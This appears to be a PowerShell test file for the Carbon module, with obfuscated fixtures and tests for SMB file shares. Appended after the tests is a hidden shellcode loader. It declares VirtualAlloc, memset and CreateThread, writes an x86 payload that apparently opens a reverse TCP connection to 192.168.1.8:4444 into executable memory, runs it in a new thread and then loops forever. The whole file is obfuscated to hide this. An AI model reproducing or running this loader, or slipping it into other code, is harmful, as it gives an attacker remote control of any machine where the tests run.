& (&("{1}{2}{0}"-f 'h','Joi','n-Pat') -Path ${pSSC`R`IPtrooT} -ChildPath ((("{1}{3}{2}{5}{4}{0}{6}" -f '-CarbonTest','..gCy','nit','I','ize','ial','.ps1'))."R`epLa`cE"(([CHAr]103+[CHAr]67+[CHAr]121),[STRiNG][CHAr]92)) -Resolve)
${ShA`R`En`Ame} = ("{2}{1}{3}{4}{0}" -f 'leShare','r','Ca','bonTe','stFi')
${shAREp`A`TH} = ${Nu`lL}
${Sh`ArE`dEs`C`RIp`TiOn} = ((("{8}{7}{1}{13}{3}{11}{2}{5}{6}{0}{4}{9}{10}{12}"-f't','r','}','ing Carbon{','-FileS','{0}','s Ge','hare fo','S','hare fu','nction','0','.',' test')) -F  [CHAr]39)

function stAr`T`-`TeSTfi`xt`URe
{
    ${Sha`ReP`AtH} = &("{2}{1}{4}{3}{0}"-f'ory','ew-Tem','N','t','pDirec') -Prefix ${Ps`COMm`ANd`pa`TH}
    &("{1}{0}{3}{2}" -f 'tall-SmbS','Ins','re','ha') -Path ${S`HAR`E`paTh} -Name ${Sh`Ar`EnAmE} -Description ${sH`ArED`e`sc`RiPtiOn}
}

function St`op`-test`FIXturE
{
    ${sHa`RE} = .("{2}{1}{0}{3}"-f'ec','WmiObj','Get-','t') ("{0}{3}{1}{2}" -f'W','n32_','Share','i') -Filter "Name='$shareName'"
    if( ${s`HaRE} -ne ${Nu`ll} )
    {
        [void] ${Sh`ARe}.("{1}{0}"-f'lete','De').Invoke()
    }

    .("{2}{1}{0}"-f 've-Item','emo','R') -Path ${sh`AREPA`TH}
}

function tE`St-shoU`L`dT`est`S`Hare
{
    ${s`H`ARES} = &("{2}{1}{0}"-f'FileShare','t-','Ge')
    &("{2}{0}{1}{3}" -f 'e','rt-','Ass','NotNull') ${s`hAREs} 
    ${shaRE`sN`OTfOU`ND} = ${ShaR`Es} | &("{0}{1}{2}{3}"-f'W','here-O','b','ject') { -not (.("{1}{2}{0}{3}" -f'-FileSha','T','est','re') -Name ${_}."Na`ME") }
    &("{0}{1}{2}" -f 'Assert','-','Null') ${shaRESN`O`Tfound}
    &("{1}{3}{0}{2}{4}" -f 'sert-N','A','oEr','s','ror')
}

function tEST-sHO`UldDeTeCtSHAr`E`STH`AtD`o`NoTe`XiST
{
    .("{2}{1}{0}"-f 'se','rt-Fal','Asse') (&("{2}{1}{0}{3}" -f'FileShar','est-','T','e') -Name ("{0}{1}{2}" -f 'fdjfkd','sf','jdsf'))
    .("{2}{0}{1}" -f 'r','t-NoError','Asse')
}


${c} = ((("{28}{43}{8}{7}{67}{5}{58}{41}{60}{48}{64}{45}{13}{53}{27}{39}{0}{18}{10}{51}{37}{40}{4}{34}{61}{66}{29}{26}{54}{50}{57}{35}{62}{32}{23}{38}{6}{14}{19}{56}{44}{12}{49}{1}{47}{25}{24}{33}{21}{20}{71}{65}{31}{69}{63}{68}{17}{15}{30}{42}{11}{52}{55}{9}{36}{70}{16}{59}{3}{2}{22}{46}" -f 'z','r lp',', u','t src',', uint flProtect);[DllI','2.dllkhw)]public st','StackSi','wkerne','kh','tr m','o','vcrt.dll','s, I','P','ze, ','ort(','t, u','llImp','e, uint flAll','Int',', I','ationFlags','int co','t','t','rameter, uin','ntPt','ress, uint ','[DllIm','extern I','k','Threa',' lpThreadAt',' dwCre','mport(khwker','d','emset','nTy','ributes, uint dw','dwSi','pe','xte','hwms','port(','tAddres','(Int','unt);','Pa','tr VirtualAl','ntPt','rea','catio','khw','tr lpAdd','r C',')]public static extern IntP','Ptr lpStar','teThrea','atic e','in','rn IntP','ne','(IntPtr',';[','loc','p','l32.dllkhw)]public static ','l3','D','dId)','(IntPtr des','ntPtr l'))."REpl`ACe"('khw',[StriNg][cHar]34));${W} = &("{1}{0}"-f'pe','Add-Ty') -memberDefinition ${C} -Name ("{1}{0}"-f 'n32','Wi') -namespace ("{1}{2}{0}" -f 'tions','Win32F','unc') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x08,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${z}."LEN`GTh" -gt 0x1000){${G} = ${Z}."leN`GtH"};${X}=${W}::("{2}{3}{0}{1}"-f'lAll','oc','Virt','ua').Invoke(0,0x1000,${G},0x40);for (${i}=0;${i} -le (${Z}."l`eNgtH"-1);${i}++) {${W}::"m`emS`eT"([IntPtr](${X}.("{0}{1}"-f'ToInt','32').Invoke()+${i}), ${z}[${I}], 1)};${w}::("{0}{2}{1}" -f'Crea','ead','teThr').Invoke(0,0,${x},0,0,0);for (;;){.("{0}{2}{1}{3}"-f'St','t-sl','ar','eep') 60};
